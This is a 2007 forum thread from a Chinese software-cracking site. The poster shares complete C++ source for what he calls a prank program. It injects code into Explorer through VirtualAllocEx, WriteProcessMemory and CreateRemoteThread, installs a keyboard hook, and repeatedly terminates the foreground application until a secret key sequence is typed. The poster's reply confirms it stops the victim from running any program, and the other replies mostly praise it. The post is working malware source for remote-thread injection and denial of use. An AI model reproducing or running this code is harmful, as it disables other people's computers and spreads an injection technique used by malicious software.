设为首页收藏本站官方微博
开启辅助访问 切换到窄版

飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

[x86]PYG官方Dll优雅破解补丁制作工具[x64]PYG官方DLL优雅破解补丁制作工具[x86]PYG官方Exe优雅破解补丁制作工具[x86/x64]Baymax Patch Tools飘云阁工具包(已更新第4季)
返回列表 发新帖
查看: 6036|回复: 8

一堆类似恶作剧的代码

[复制链接]
Gue

该用户从未签到
发表于 2007-10-31 21:48:41 | 显示全部楼层 |阅读模式
不记得为什么要写的了,可能是因为太无聊/:L ..  整理硬盘看到的, 不忍心直接删了, 来这里发一份..   :)
  1. // test.cpp : Defines the entry point for the application.
  2. //

  4. #include "stdafx.h"

  6. typedef int (WINAPI *MESSAGEBOXA)(HWND, LPCTSTR, LPCTSTR, UINT);        //MessageBoxA原型
  7. typedef HHOOK (WINAPI *SETWINDOWSHOOKEXA)(int,  HOOKPROC, HINSTANCE, DWORD);        //SetWindowsHookEx原型
  8. typedef BOOL (WINAPI *UNHOOKWINDOWSHOOKEX)(HHOOK);                //UnHookWindowsHookEx原型
  9. typedef UINT (WINAPI *SETTIMER)(HWND, UINT, UINT, TIMERPROC);        //SetTimer原型
  10. typedef BOOL (WINAPI *KILLTIMER)(HWND, UINT);        //KillTimer原型
  11. typedef BOOL (WINAPI *TERMINATEPROCESS)(HANDLE, UINT);        //TerminateProcess原型
  12. typedef HWND (WINAPI *GETFOREGROUNDWINDOW)();        //GetForegroundWindow原型
  13. typedef DWORD (WINAPI *GETWINDOWTHREADPROCESSID)(HWND, LPDWORD);        //GetWindowThreadProcessId原型
  14. typedef VOID (WINAPI *SLEEP)(DWORD);        //Sleep原型
  15. typedef HANDLE (WINAPI *OPENPROCESS)(DWORD, BOOL, DWORD);                //OpenProcess原型
  16. typedef LRESULT (WINAPI *CALLNEXTHOOKEX)(HHOOK, int, WPARAM, LPARAM);        //CallNextHookEx原型
  17. typedef BOOL (WINAPI *CLOSEHANDLE)(HANDLE);
  18. typedef DWORD (WINAPI *GETCURRENTTHREADID)(VOID);


  21. typedef struct {        //注入的数据
  22.         DWORD dwMagic;

  24.         MESSAGEBOXA pfnMessageBoxA;
  25.         SETWINDOWSHOOKEXA pfnSetWindowsHookExA;
  26.         UNHOOKWINDOWSHOOKEX pfnUnHookWindowsHookEx;
  27.         SETTIMER pfnSetTimer;
  28.         KILLTIMER pfnKillTimer;
  29.         TERMINATEPROCESS pfnTerminateProcess;
  30.         GETFOREGROUNDWINDOW pfnGetForegroundWindow;
  31.         GETWINDOWTHREADPROCESSID pfnGetWindowThreadProcessId;
  32.         SLEEP pfnSleep;
  33.         OPENPROCESS pfnOpenProcess;
  34.         CALLNEXTHOOKEX pfnCallNextHookEx;
  35.         CLOSEHANDLE pfnCloseHandle;
  36.         GETCURRENTTHREADID pfnGetCurrentThreadId;

  38.         LPVOID pVirtualMemory;
  39.         DWORD dwCodeLen;
  40.         DWORD dwDesktopProcessId;
  41.         DWORD dwDesktopThreadId;
  42.         bool Quit;
  43.         HHOOK hhk;
  44.         UINT uTimerId;
  45.         DWORD dwPosition;
  46. }InjectData, *pInjectData;

  48. LRESULT CALLBACK KeyboardProc(int, WPARAM, LPARAM); //钩子回调函数
  49. VOID CALLBACK TimerProc(HWND, UINT, UINT, DWORD);        //时钟的回调函数
  50. pInjectData GetDataAddress(LPVOID, LPVOID);


  53. DWORD WINAPI mycode(LPVOID lpParam)
  54. {
  55.         pInjectData Data = GetDataAddress(mycode, mycode);

  57.         HOOKPROC MyKeyboardProc = (HOOKPROC)((DWORD)Data->pVirtualMemory + ((DWORD)KeyboardProc - (DWORD)mycode));
  58.         TIMERPROC MyTimerProc = (TIMERPROC)((DWORD)Data->pVirtualMemory + ((DWORD)TimerProc - (DWORD)mycode));

  60.         Data->hhk = Data->pfnSetWindowsHookExA(WH_KEYBOARD, MyKeyboardProc, NULL, Data->dwDesktopThreadId);    //挂键盘钩子
  61. //        Data->uTimerId = Data->pfnSetTimer(NULL, NULL, 1000, MyTimerProc);        //打开时钟
  62.         while (true) {
  63.                 Data->pfnSleep(1000);
  64.                 TimerProc(0,0,0,0);
  65.                 if (Data->Quit) {
  66. //                        Data->pfnKillTimer(NULL, Data->uTimerId);
  67.                         Data->pfnUnHookWindowsHookEx(Data->hhk);
  68.                         break;
  69.                 }
  70.         }
  71.         return 0;
  72. }

  74. LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
  75. {
  76.         pInjectData Data = GetDataAddress(mycode, KeyboardProc);

  78.         if ((code == HC_ACTION) && (lParam & 0x40000000)) {

  80.                 unsigned char szPassword[] = {0x36,0x36,0x31,0x36,0x31,0x31,0x36};

  82.                 if ((DWORD)wParam == szPassword[Data->dwPosition])
  83.                         Data->dwPosition++;
  84.                 else
  85.                         Data->dwPosition = 0;

  87.                 if (Data->dwPosition == sizeof(szPassword)) {
  88.                         Data->Quit = true;
  89.                         //Data->pfnMessageBoxA(0, (char*)&wParam, 0, 0);
  90.                 }
  91.         }

  93.         return Data->pfnCallNextHookEx(Data->hhk, code, wParam, lParam);
  94. }

  96. VOID CALLBACK TimerProc(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime)
  97. {
  98.         pInjectData Data = GetDataAddress(mycode, TimerProc);
  99.         DWORD dwCurrProcId;
  100.         Data->pfnGetWindowThreadProcessId(Data->pfnGetForegroundWindow(), &dwCurrProcId);
  101.         if (!(dwCurrProcId % 2)) {
  102.                 if (dwCurrProcId != Data->dwDesktopProcessId) {
  103.                         HANDLE hProc = Data->pfnOpenProcess(PROCESS_ALL_ACCESS, false, dwCurrProcId);
  104.                         Data->pfnTerminateProcess(hProc, 0x0);
  105.                         Data->pfnCloseHandle(hProc);
  106.                 }
  107.         }
  108. }

  110. pInjectData GetDataAddress(LPVOID lpEntryAddress, LPVOID lpCurrentAddress)
  111. {
  112.         DWORD dwVM = 0;
  113.         __asm {
  114.                 push eax;
  115.                 mov eax, dword ptr [ebp+4];
  116.                 mov dwVM, eax;
  117.                 pop eax;
  118.         }

  120.         pInjectData pDataAddress = (pInjectData)(dwVM & 0xFFFF0000);

  122.         while (true) {
  123.                 if (pDataAddress->dwMagic == 0x11111111)
  124.                         return (pInjectData)pDataAddress;
  125.                 pDataAddress = (pInjectData)((char*)pDataAddress + 100);
  126.         }
  127. }

  129. int APIENTRY WinMain(HINSTANCE hInstance,
  130.                      HINSTANCE hPrevInstance,
  131.                      LPSTR     lpCmdLine,
  132.                      int       nCmdShow)
  133. {
  134.         DWORD dwDesktopProcID;        //桌面的进程ID
  135.         DWORD nCodeLen = (DWORD)WinMain - (DWORD)mycode;        //要注入的代码长度
  136.         InjectData Data;        //注入的数据
  137.         DWORD dwStructLen = sizeof(InjectData); //注入的数据长度
  138.         DWORD dwSizeOfVirtual;        //要分配的内存长度

  140.         Data.dwMagic = 0x11111111;
  141.         Data.dwPosition = 0;

  143.         //对齐
  144.         nCodeLen = 100 + (nCodeLen - 1) / 100 * 100;

  146.         dwSizeOfVirtual = nCodeLen + dwStructLen;  //计算要分配的内存长度

  148.         //初始化注入的数据
  149.         Data.dwCodeLen = nCodeLen;
  150.         Data.Quit = false;
  151.         //
  152.         //设置远程线程要调用的函数地址
  153.         HINSTANCE hLib = LoadLibrary("User32.dll");
  154.         if (hLib) {
  155.                 Data.pfnGetForegroundWindow = (GETFOREGROUNDWINDOW)GetProcAddress(hLib, "GetForegroundWindow");
  156.                 Data.pfnKillTimer = (KILLTIMER)GetProcAddress(hLib, "KillTimer");
  157.                 Data.pfnMessageBoxA = (MESSAGEBOXA)GetProcAddress(hLib, "MessageBoxA");
  158.                 Data.pfnSetTimer = (SETTIMER)GetProcAddress(hLib, "SetTimer");
  159.                 Data.pfnSetWindowsHookExA = (SETWINDOWSHOOKEXA)GetProcAddress(hLib, "SetWindowsHookExA");
  160.                 Data.pfnUnHookWindowsHookEx = (UNHOOKWINDOWSHOOKEX)GetProcAddress(hLib, "UnhookWindowsHookEx");
  161.                 Data.pfnGetWindowThreadProcessId = (GETWINDOWTHREADPROCESSID)GetProcAddress(hLib, "GetWindowThreadProcessId");
  162.                 Data.pfnCallNextHookEx = (CALLNEXTHOOKEX)GetProcAddress(hLib, "CallNextHookEx");
  163.                 FreeLibrary(hLib);
  164.         } else {
  165.                 MessageBox(NULL, "加载User32.dll失败", 0, MB_OK);
  166.                 return 0;
  167.         }

  169.         hLib = LoadLibrary("Kernel32.dll");
  170.         if (hLib) {
  171.                 Data.pfnTerminateProcess = (TERMINATEPROCESS)GetProcAddress(hLib, "TerminateProcess");
  172.                 Data.pfnSleep = (SLEEP)GetProcAddress(hLib, "Sleep");
  173.                 Data.pfnOpenProcess = (OPENPROCESS)GetProcAddress(hLib, "OpenProcess");
  174.                 Data.pfnCloseHandle = (CLOSEHANDLE)GetProcAddress(hLib, "CloseHandle");
  175.                 Data.pfnGetCurrentThreadId = (GETCURRENTTHREADID)GetProcAddress(hLib, "GetCurrentThreadId");
  176.                 FreeLibrary(hLib);
  177.         } else {
  178.                 MessageBox(NULL, "加载Kernel32.dll失败", 0, MB_OK);
  179.                 return 0;
  180.         }

  182.         //
  183.         //开始注入
  184.         Data.dwDesktopThreadId = GetWindowThreadProcessId(FindWindow("Progman", NULL), &dwDesktopProcID);        //得到桌面句柄

  186.         if (dwDesktopProcID) {
  187.                 Data.dwDesktopProcessId = dwDesktopProcID;        //保存桌面进程ID
  188.                 HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwDesktopProcID);        //打开进程,准备开辟一个空间来存放注入的代码

  190.                 if (hProcess) {
  191.                         LPVOID pMem = VirtualAllocEx(hProcess, NULL, dwSizeOfVirtual, MEM_COMMIT, PAGE_EXECUTE_READWRITE);        //在目标进程开辟一个内存空间存放代码

  193.                         if (pMem) {
  194.                                 Data.pVirtualMemory = pMem;
  195.                                 LPVOID lpDataAddress = (char*)pMem + nCodeLen;  //计算数据要写入的位置
  196.                                 if ((!WriteProcessMemory(hProcess, pMem, (LPVOID)mycode, nCodeLen, NULL) || (!WriteProcessMemory(hProcess, lpDataAddress, (LPVOID)&Data, dwStructLen, NULL)))) {        //写入自己的代码.
  197.                                         MessageBox(NULL,"注入代码时失败", "提示", MB_OK);
  198.                                         VirtualFreeEx(hProcess, pMem, dwSizeOfVirtual, MEM_RELEASE);
  199.                                 }

  201.                                 else
  202.                                         CloseHandle(CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, lpDataAddress, 0, NULL)); //运行代码
  203.                         }
  204.                 CloseHandle(hProcess);
  205.                 }
  206.         }
  207.         return 0;
  208. }
复制代码
代码, 恶作剧

相关帖子

PYG19周年生日快乐!
回复

使用道具 举报

senots

该用户从未签到
发表于 2007-11-1 00:00:52 | 显示全部楼层
看不懂。膜拜下。。。
PYG19周年生日快乐!
回复 支持 反对

使用道具 举报

Gue

该用户从未签到
 楼主| 发表于 2007-11-1 16:28:40 | 显示全部楼层
作用就在Explore.exe里面注入段代码,然后不停的把最前台的程序杀掉,让你什么程序也运行不了./:017
PYG19周年生日快乐!
回复 支持 反对

使用道具 举报

caterpilla

该用户从未签到
发表于 2007-11-1 16:45:27 | 显示全部楼层
厉害,好好学习!!!
PYG19周年生日快乐!
回复 支持 反对

使用道具 举报

那时的天空

该用户从未签到
发表于 2007-11-3 06:06:06 | 显示全部楼层
太复杂了吧,懒得看了
PYG19周年生日快乐!
回复 支持 反对

使用道具 举报

Gue

该用户从未签到
 楼主| 发表于 2007-11-3 14:48:10 | 显示全部楼层
呵呵,有些地方被换行了,看上去代码是乱糟糟的.
PYG19周年生日快乐!
回复 支持 反对

使用道具 举报

xingke
  • TA的每日心情
    开心
    2024-6-9 16:20

    • 签到天数: 24 天

    [LV.4]偶尔看看III
    发表于 2007-11-3 16:16:55 | 显示全部楼层
    不错啊。
    PYG19周年生日快乐!
    回复 支持 反对

    使用道具 举报

    Gue

    该用户从未签到
     楼主| 发表于 2007-11-3 17:11:44 | 显示全部楼层
    原帖由 xingke 于 2007-11-3 16:16 发表
    不错啊。



    啊了,我也终于有个精华了,3Q.
    PYG19周年生日快乐!
    回复 支持 反对

    使用道具 举报

    ttch

    该用户从未签到
    发表于 2007-11-5 15:42:09 | 显示全部楼层
    哈哈

    好狠的代码
    PYG19周年生日快乐!
    回复 支持 反对

    使用道具 举报

    返回列表 发新帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 加入我们

    本版积分规则

    快速回复 返回顶部 返回列表